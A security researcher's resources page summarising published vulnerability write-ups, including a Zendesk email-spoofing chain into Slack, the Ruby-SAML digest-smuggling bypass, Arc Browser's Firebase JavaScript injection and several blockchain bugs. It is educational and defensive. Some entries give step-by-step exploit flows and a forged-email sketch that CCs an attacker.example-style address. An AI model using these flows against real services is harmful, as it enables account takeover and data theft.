Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Cosmos LSM Module Backdoor - 1517

AllInBits    Reference →Posted 1 Year Ago
  • The Cosmos SDK is a popular AppChain SDK used by various blockchains like Osmosis. The main developer of the SDK is the Interchain Foundation. Over the past 3 years, the Liquid Staking Module (LSM) was built by a third party called Iqlusion. This is where the drama is at.
  • Iqlusion developed all of the LSM code for the Cosmos SDK alongside an individual named Zaki. In July of 2022, Oak Security performed a security audit of the codebase. They found a fairly bad vulnerability that was brushed off by the developers and marked as intended design: a staker could avoid slashing by tokenizing their delegations, a major compromise of the protocol's security.
  • A year after this code was reviewed, Zaki was contacted by the FBI (I'm serious) about the developers being linked to North Korean threat actors. For some reason, Zaki did not disclose this to anyone in the Cosmos community and continued with the project as normal. A few months later, a proposal was made to add the LSM to the Cosmos Hub. To me, this shows a major lapse in judgement from Zaki - prioritizing features and personal gain over security.
  • Eventually, the LSM was added to the Cosmos Hub. This is disturbing for two reasons. First, a fairly bad vulnerability in the repository was never fixed. Most of the time, auditors are willing to relent after some discussion; given that the vulnerability was still there, it's strange that this moved forward anyway. Second, another issue, intentionally added by the NK developers, may have been present in the codebase without anybody knowing.
  • All of this recently came to light because of an article from CoinDesk. To me, it's scary how the code got to production without anybody flagging the security issue in the report, and how an individual never mentioned the NK developers working on it.
  • An absolutely crazy situation. When working with this amount of money and anonymity though, these things are bound to happen. Personally, I think the article repeats itself too much for dramatic effect and calls the vulnerability "critical" when the Oak Security report itself labels it a high. Regardless, the write-up has a lot of good links, which I appreciate.
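The slashing-avoidance finding can be illustrated with a toy model. This is a minimal sketch, not the real Cosmos SDK API; all names and mechanics here are illustrative assumptions. The point: if slashing only iterates over live delegation records, converting a delegation into transferable tokens right before a slash lands escapes the penalty.

```python
# Toy model of the Oak Security finding; names are illustrative,
# not the real Cosmos SDK API.
class Chain:
    def __init__(self):
        self.delegations = {}  # staker -> staked amount
        self.lst_tokens = {}   # staker -> tokenized (bearer) amount

    def delegate(self, staker, amount):
        self.delegations[staker] = self.delegations.get(staker, 0) + amount

    def tokenize(self, staker):
        # The delegation record that slashing would hit is removed
        # and replaced by freely transferable tokens.
        amount = self.delegations.pop(staker, 0)
        self.lst_tokens[staker] = self.lst_tokens.get(staker, 0) + amount

    def slash(self, fraction):
        # Only live delegation records are penalized.
        for staker in self.delegations:
            self.delegations[staker] *= (1 - fraction)

chain = Chain()
chain.delegate("honest", 100)
chain.delegate("evader", 100)
chain.tokenize("evader")   # tokenize right before the slash lands
chain.slash(0.05)
# The honest staker loses 5; the evader's 100 sits untouched in tokens.
```

The fix would have been for the slashing logic to track and penalize tokenized shares as well.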

Zendesk Backdoor for Half of All Fortune 500 Companies - 1516

hackermondev    Reference →Posted 1 Year Ago
  • Zendesk is a customer service tool. To set it up, you link it to your company's customer support email, such as support@company.com. Zendesk then manages all incoming emails and creates tickets for you.
  • When an email is sent to the company's Zendesk support email, a new ticket is created. To keep track of the thread, an automatic reply-to address is created: support+id{id}@company.com, where {id} is the ticket number. Zendesk also has ticket collaboration, which lets you CC someone on email replies. The author found a really bad bug in this.
  • Zendesk did not protect against email spoofing on the collaboration feature! This meant that an attacker could impersonate the original sender to tag their own email onto the ticket. Now, all of the ticket information would be readable by the attacker. Ticket IDs are also sequential, making them easy to guess.
  • When reported, both HackerOne and Zendesk claimed this fell "out of scope" because of a clause saying that "SPF, DKIM and DMARC issues are out of scope". Instead of just popping a single company with this over and over again, the author decided to escalate. In a previous blog post from 2017, the author had used Zendesk to log in to private Slack workspaces by bypassing email verification via the support email. They wanted to reproduce this.
  • Slack had since added a protection against these attacks: a random token in the no-reply address. Since the exploit required knowing this token, the old approach wouldn't work anymore. But while this protection was added for Slack's own email flow, it was NOT added for the other login options, Google and Apple OAuth!
  • The exploit flow was as follows:
    1. Create an Apple account with support@company.com as the email to request a verification code.
    2. Apple sends the verification code to Zendesk, which automatically creates the ticket.
    3. Use the email spoofing bug to add yourself to the ticket created for the Apple email verification.
    4. Log in to the support portal as the CCed account; the ticket now contains the code.
    5. Enter the verification code in Apple to confirm the address.
    6. Use Slack's "Login with Apple" feature with your new company email.
  • The author reported the vulnerability to a lot of Fortune 500 companies and got 50K in bug bounties from them, but Zendesk wasn't happy. The kid (he's 15) hadn't shown Zendesk the Slack privilege escalation technique, which dramatically escalated the impact. Finally, two months after submission, Zendesk fixed the issue but claimed that email flagging in their internal systems would have caught this. Because he broke the HackerOne disclosure guidelines, he got no bounty from them.
  • Personally, I don't think this was handled properly on either side. Attackers don't care about scope - they care about impact. So, Zendesk should have dealt with this imo. Daniel also didn't show HackerOne the Slack privilege escalation, but Zendesk may not have cared even if he did. They only cared once their customers complained. Feels like a damned-if-you-do, damned-if-you-don't situation.
  • Regardless, a simple vulnerability, an amazingly creative privilege escalation, and drama in the bug reporting made this an awesome read. The author sums up the experience best at the end: "that's the reality of bug hunting—sometimes you win, sometimes you don't."
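The spoofing at the heart of step 3 can be sketched as the construction of a forged reply. The addresses below are hypothetical, and actually delivering such a message relies on Zendesk not verifying SPF/DKIM/DMARC on collaboration emails:

```python
from email.message import EmailMessage

# Hypothetical addresses: a real attack would guess the sequential
# ticket id and spoof whoever opened the ticket (here, an Apple
# verification sender is imagined as the victim thread).
msg = EmailMessage()
msg["From"] = "no-reply@id.example.com"     # spoofed original sender
msg["To"] = "support+id12345@company.com"   # Zendesk per-ticket reply address
msg["Cc"] = "attacker@evil.example"         # collaborator added to the ticket
msg["Subject"] = "Re: Verify your email address"
msg.set_content("Looping in a colleague on this thread.")

# Zendesk trusted the From header, so the CCed address was attached
# to the ticket and could read the whole thread, code included.
```

Sending this through any mail server that doesn't enforce sender authentication completes the attack; the fix is simply to verify SPF/DKIM/DMARC before honoring the CC.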

NES DPCM Workaround Vulnerability Leads to ACE in SMB3 - 1515

100th Coin    Reference →Posted 1 Year Ago
  • The Nintendo Entertainment System (NES) was built in the era of CRT TVs, where rendering is entirely different than on modern displays. Graphical changes must happen during a blanking period, so there is an interrupt to ensure this is the case: the VBlank interrupt, a Non-Maskable Interrupt (NMI).
  • The game console also has Interrupt Requests, or IRQs for short. Depending on the current game mode, the IRQ behaves differently. Additionally, the NES organizes logical blocks of code and assets into banks, where only one bank can be loaded at a time.
  • The NMI handler swaps out the PRG bank during graphics changes and, by the end of the NMI, swaps the proper banks back in. What if we could trick code into running with the improper banks loaded? That is exactly how this vulnerability works!
  • DPCM audio samples have the ability to corrupt controller inputs: the controller's shift register gets shifted one too many times. Since the DPCM DMA read is asynchronous and this is a hardware issue, it must be worked around in software. The most common fix was to simply poll the controller over and over again until the same buttons were read twice in a row.
  • So, what's the bug? By changing buttons at a rate of 8K inputs per frame, we can trick the controller polling code into looping forever! Paired with an interrupt, this leads to code from a bank never intended for this context being run!
  • By some miracle, the code runs fine. Eventually, an RTS instruction jumps execution to $0000 using an address from the stack. The NMI continues to fire every frame, recording button inputs to $17, $18, $F5, $F6, and $F8. Through careful planning, the controller inputs can be used to write somewhat arbitrary asm to execute.
  • $17 holds the total held buttons on controller 1 and $18 holds the newly pressed buttons, one bit per button. $F5, $F6, and $F8 have similar limitations to $17/$18. This limits which byte values can be encoded as the second byte. Additionally, left and right, as well as up and down, cannot be held at the same time, further limiting the possible instructions.
  • With these limitations in mind, the goal is to warp to the end credits. Six criteria need to be met, three of which already hold once the wrong bank is loaded. Of the rest: the stack pointer must be greater than 0x30, the NMI mode byte at address $100 must be 0x20, and we need to jump to $B85A.
  • Previous versions of the TAS had to work around the limitations above. However, the author found a special case: addresses 0x0-0x2 are used as scratch space at the end of an NMI, and they happen to hold controller inputs INCLUDING the conflicting inputs. This gives more control over these bytes, which happens to be enough :)
  • The TAS is 3 frames of gameplay. Here is what happens:
    1. Using both controllers, write JSR $9000 to the scratch addresses. Using only controller inputs, set the SP register to 0xFA.
    2. The next NMI occurs and writes our controller inputs to the stack. This time, our inputs result in JSR $0000 being executed.
    3. After our jump occurs, the JSR $9000 written earlier executes. Since the SP is sane, this works.
  • The video explains a slightly simplified version, which is what this example is based on; the concepts are the same. A funny change they made was using a different version of the game, because the addresses are slightly different.
  • Overall, the article and video are amazing resources! Beating SMB3 in less than a second is hilarious, and I very much enjoyed learning about this. From the vulnerability itself to making the exploit work, it's truly magic :)
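The double-read workaround, and how the exploit defeats it, can be sketched in Python (a simulation of the idea, not actual NES code): re-poll until two consecutive reads agree, which filters a one-off DPCM corruption but never settles if the buttons genuinely change on every poll.

```python
def poll_until_stable(reads):
    """Return the first value seen twice in a row, mimicking the
    common software workaround for DPCM-corrupted controller reads."""
    it = iter(reads)
    prev = next(it)
    for cur in it:
        if cur == prev:
            return cur
        prev = cur
    return None  # inputs changed on every poll: the loop never settles

# A single corrupted read (0x40) in the middle is filtered out:
poll_until_stable([0x81, 0x40, 0x81, 0x81])   # -> 0x81

# The exploit: flip the buttons faster than the game polls, so no two
# consecutive reads ever agree and the loop spins until an interrupt fires.
poll_until_stable([0x81, 0x40, 0x81, 0x40])   # -> None
```

On real hardware the second case is an infinite loop, which is exactly the window the NMI needs to fire with the wrong bank still mapped in.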
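The D-pad constraint on encodable bytes can also be counted. This sketch assumes the common A, B, Select, Start, Up, Down, Left, Right bit order (MSB first); the game's actual in-memory layout may differ.

```python
# D-pad bits under the assumed A,B,Select,Start,Up,Down,Left,Right
# (MSB-first) layout.
UP, DOWN, LEFT, RIGHT = 0x08, 0x04, 0x02, 0x01

def encodable(byte):
    # A stock controller cannot report Up+Down or Left+Right together.
    if (byte & UP) and (byte & DOWN):
        return False
    if (byte & LEFT) and (byte & RIGHT):
        return False
    return True

print(sum(encodable(b) for b in range(256)))  # 144 of the 256 byte values
```

Each impossible pair rules out a quarter of the space, leaving 256 × 3/4 × 3/4 = 144 reachable byte values, which is why writing arbitrary asm purely from controller inputs takes such careful planning.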

gaining access to anyones browser without them even visiting a website - 1514

Eva    Reference →Posted 1 Year Ago
  • Arc is a new browser focused on security and privacy. They recently added cloud functionality for storing CSS and JavaScript browser customizations called Boosts.
  • Firebase is a database-as-a-service. Instead of writing a full backend, you write security rules for what users can and can't do. Although this tool is awesome, many folks have messed up the rules in the past.
  • Reading the Firebase security rules, we can't modify other users' data directly because it's queried by CreatorId. However, we can specify our boost to have another user's ID! Most of the time, blindly adding data to another user's account isn't helpful. When that data is JavaScript run in the browser, though, it's really bad.
  • To find user IDs, an attacker can look through referrals, published boosts, and whiteboards. To make matters worse, privileged pages in Chromium, such as chrome://settings, were affected by this. Since these pages have special permissions, it's likely that RCE was possible.
  • Arc decided to migrate off of Firebase in light of this issue. I personally haven't spent too much time looking at Firebase but it seems popular yet difficult to use securely. Good find!
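The flawed authorization can be modeled in a few lines. This is an in-memory Python sketch of the logic, not Firebase's actual rules syntax: reads really are scoped by CreatorId, but writes never check that the submitted CreatorId matches the authenticated user.

```python
# In-memory model of the flawed rules; not real Firebase syntax.
boosts = []

def create_boost(auth_uid, boost):
    # Flaw: nothing checks that boost["CreatorId"] == auth_uid.
    boosts.append(boost)

def get_boosts(auth_uid):
    # Reads are correctly scoped to the requesting user...
    return [b for b in boosts if b["CreatorId"] == auth_uid]

# ...so an attacker plants JavaScript under the victim's ID,
# and the victim's browser happily loads it as their own boost.
create_boost("attacker-uid", {"CreatorId": "victim-uid", "js": "alert(1)"})
print(get_boosts("victim-uid"))
```

The rules-side fix would be rejecting any write whose CreatorId differs from the authenticated user's ID (or, as Arc chose, migrating off Firebase entirely).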

Vest in Peace: Freezing Cosmos account funds through invalid vesting periods - 1513

ForDefi     Reference →Posted 1 Year Ago
  • In the Cosmos SDK, a vesting account is a type of account whose coins are locked for some vesting schedule. A periodic vesting account will give out funds at defined intervals. A clawback account has an additional locking period, after which the vesting funds are received.
  • Neither periodic nor clawback accounts validate their input upon account creation: the code fails to check that the amount in each vesting period is positive. Several variants of this missing input validation exist in forks of the Cosmos SDK as well.
  • So, what's the impact? An attacker can initialize a vesting account whose funds are impossible to withdraw. With a negative token amount such as -1stake in a period, the bank module's check that a user isn't overdrawing will panic.
  • To make this work, the authors note you would want to watch for a new account being created, frontrun it, and poison it. The account can then receive funds but cannot take them out. Frontrunning is unlikely to occur in Cosmos but is technically possible.
  • The fix is to simply validate that all amounts are positive. Overall, a good read and a nice look into vesting accounts in the Cosmos SDK.
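The missing check is small. Here is a sketch of the validation in Python (the real SDK is Go and its coin types differ, so treat this as pseudocode of the fix, with period shapes invented for illustration):

```python
# Each vesting period holds a length (seconds) and coin amounts,
# e.g. {"stake": -1} for the malicious "-1stake" poison.
def validate_periods(periods):
    for i, period in enumerate(periods):
        if period["length"] <= 0:
            raise ValueError(f"period {i}: non-positive length")
        for denom, amount in period["amount"].items():
            # The missing check: every amount must be strictly positive.
            if amount <= 0:
                raise ValueError(f"period {i}: invalid amount {amount}{denom}")

validate_periods([{"length": 60, "amount": {"stake": 100}}])  # ok

try:
    validate_periods([{"length": 60, "amount": {"stake": -1}}])  # the poison
except ValueError as e:
    print(e)  # period 0: invalid amount -1stake
```

Running this at account creation rejects the poisoned account before the bank module can ever hit the panic.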

Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) - 1512

Project Discovery    Reference →Posted 1 Year Ago
  • SAML is a common protocol for exchanging authentication and authorization data between IdPs and Service Providers (SPs). SAML is written in the markup language XML.
  • In SAML, the core element is the Assertion. This holds information about user details in most cases. To ensure it hasn't been tampered with, the assertion is hashed and then verified with a digital signature.
  • The Signature value is passed inside the SignatureValue element. The hashed data is in the SignedInfo block. This contains a DigestValue and a Reference URI pointing to the assertion.
  • To verify the signature, a service provider receives the SAML response and performs two checks: digest verification and signature verification. Digest verification hashes the Assertion data and checks that it matches the DigestValue in the SignedInfo block, preventing tampering. Signature verification then validates the digital signature over the SignedInfo block.
  • The Ruby-SAML library has several validations before the signature validation. In XPath, the language used for finding elements in an XML document, / selects from the root of the document, while // selects matching nodes anywhere in the document.
  • Finally, on to the vulnerability! When getting the DigestValue via XPath, the query was //ds:DigestValue. This matches the first DigestValue anywhere in the document, allowing an attacker to smuggle their own value into the document.
  • This is bad! In the SAML validation, we can bypass the verification with the following flow:
    1. Insert a DigestValue into an unsigned element with a modified Assertion block.
    2. XPath extracts the smuggled value instead of the one from the SignedInfo block. This bypasses the first step above of checking that the DigestValue is correct.
    3. Signature verification still occurs over the unmodified SignedInfo block, so it passes; the earlier digest check was assumed to have proven that the actual hash and the one in this block match.
  • The author includes an XML document that is super interesting to look at from a security perspective. An awesome find in a technology I'm not super familiar with, but enjoyable nonetheless.
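The scoping problem is easy to reproduce with a toy document. This sketch strips namespaces for brevity (real SAML uses the ds: prefix) and is not a real SAML response: a document-wide // query returns the first DigestValue in document order, which can be one smuggled into an unsigned element.

```python
import xml.etree.ElementTree as ET

# Toy response, namespaces stripped. The smuggled DigestValue sits in
# an unsigned element that appears earlier in document order.
doc = ET.fromstring("""
<Response>
  <Extensions>
    <DigestValue>hash-of-TAMPERED-assertion</DigestValue>
  </Extensions>
  <Signature>
    <SignedInfo>
      <DigestValue>hash-of-original-assertion</DigestValue>
    </SignedInfo>
  </Signature>
</Response>
""")

# The vulnerable //DigestValue-style query: first match anywhere.
print(doc.find(".//DigestValue").text)

# A query anchored inside SignedInfo returns the signed one.
print(doc.find("./Signature/SignedInfo/DigestValue").text)
```

The fix in Ruby-SAML was essentially this second form: scope the query to the signed subtree instead of searching the whole document.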

Eliminating Memory Safety Vulnerabilities at the Source - 1511

Google Security Blog    Reference →Posted 1 Year Ago
  • The blog post revolves around Google Android's security program, but the results apply elsewhere. Android has produced more and more code in memory-safe languages like Rust instead of unsafe ones like C. This post analyzes the number of memory corruption vulnerabilities over the years.
  • Over the course of 6 years, most new development has occurred in memory-safe languages. Even though the amount of code is slowly growing in the memory unsafe languages and the original unsafe code still exists, the amount of memory corruption bugs has dropped significantly. Why though? Doesn't all memory-unsafe code need to be rewritten?
  • According to this article, the answer is no. Vulnerabilities are much more likely to be discovered in new code, as found by a Usenix paper from years ago. According to the details from Android and Chromium bugs, 5-year-old code is 3.4 to 7.4 times less likely to have a bug than new code. So, once Android code is 6 years old, it is much less likely to have bugs in it. As a result, we don't need to rewrite all memory-unsafe code, saving lots of money and bugs along the way.
  • In terms of designing software, killing bug classes from the beginning is the way to go. If you use a memory-safe language, you kill a bug class entirely, which is amazing. This is opposed to the original and expensive style of reactive patching, exploit mitigations like ASLR, NX, etc., and proactive vulnerability discovery. Overall, a great article on where to hunt for bugs!

Web3 Ping of Death: Finding and Fixing a Chain-Halting Vulnerability in NEAR - 1510

Faith - Zellic    Reference →Posted 1 Year Ago
  • Rust is perfectly safe and we never have to worry again, right? In Rust, error handling is tedious and must be done explicitly. Because of this, many denial-of-service (DoS) vectors revolve around error handling in Rust.
  • In P2P networking, you communicate with other computers, which in turn communicate with other computers. This is a necessity in a blockchain network, and it must be externally exposed in some way.
  • The author found two locations where errors were not being handled correctly. First, when verifying a public key, the from_slice() function requires the input to be 32 bytes long. The P2P handshake code calls expect(), a variant of unwrap() with a custom message, on the result. If the public key isn't 32 bytes, a panic is triggered.
  • The second vulnerability has to do with signature parsing. The ECDSA from_i32() function converts the recovery ID value from a single byte to an i32. The value must be between 0 and 3, but the incoming byte can in reality be 0-255. Later on, unwrap() is called on the result, causing a panic when the error path is taken.
  • Both of these vulnerabilities cause a panic that crashes the node. To me, it's weird that a small parsing issue crashes the node outright with no recovery, the way Golang can recover from a panic. Between the two vulnerabilities, the author got 150K in bug bounties, which is awesome! It's fascinating how such small error-handling functions can have catastrophic consequences for the uptime of the software.
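The pattern behind both bugs, and its fix, can be sketched in Python (the actual code is Rust; raise/except here stands in for Result handling, and the function names are illustrative): parse untrusted peer data and drop the message on failure instead of crashing the process.

```python
def parse_recovery_id(byte):
    # Mirrors the from_i32-style check: only 0..3 are valid,
    # but an attacker controls the full 0..255 range.
    if not 0 <= byte <= 3:
        raise ValueError(f"invalid recovery id: {byte}")
    return byte

def handle_peer_message(byte):
    # The fix: treat a parse failure as a bad message, not a fatal panic.
    try:
        return parse_recovery_id(byte)
    except ValueError:
        return None  # drop the malformed message; the node stays up

handle_peer_message(2)    # a valid recovery id passes through
handle_peer_message(200)  # malformed input is dropped instead of crashing
```

The vulnerable version is the equivalent of calling parse_recovery_id() bare: one malformed packet from any peer takes the whole node down.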

CharismaBTC hack incident analysis - 1509

ExVul    Reference →Posted 1 Year Ago
  • The smart contract runtime for this exploit is Stacks, a Bitcoin layer 2 that uses the Clarity smart contract language. Honestly, I couldn't follow this article, and I don't know how Stacks/Clarity works either, so I had to ask a friend how this exploit worked. Take this with a grain of salt.
  • In most smart contract runtimes, you send funds alongside your call. In Stacks, the end user's wallet specifies post conditions that determine what can be done, making this fail open instead of fail closed. In theory, if no post condition disallows a contract taking all of your tokens, then it's legal to do so.
  • In Solidity, there are two senders: tx.origin, the original executor of the transaction, and msg.sender, the most recent caller. The same concept exists in Clarity as well.
  • When making an external call to another contract, the AsContract command can override the tx.origin of the original caller. This is super important because this is what the post conditions are based around!
  • The post conditions can only be set by the original executor and NOT the smart contract. When the AsContract command is used, if the call is made to an untrusted contract then there are no post conditions restricting where the money can go for this! This lack of access control on the smart contract call is the reason for the bug. By becoming the contract, we can now drain all of the funds from it. Yikes!
  • The existence of AsContract is weird to me. I get that there are situations where you want to act as the contract, but it's such a security liability here. Again, not a great write-up, but an interesting vulnerability class nonetheless.

CSP Bypass Website - 1508

renniepak    Reference →Posted 1 Year Ago
  • Content Security Policies (CSP) are an XSS defense mechanism. Of course, if you've found XSS, you want to circumvent the CSP. This is a website collecting known CSP bypass gadgets across various popular bug bounty programs.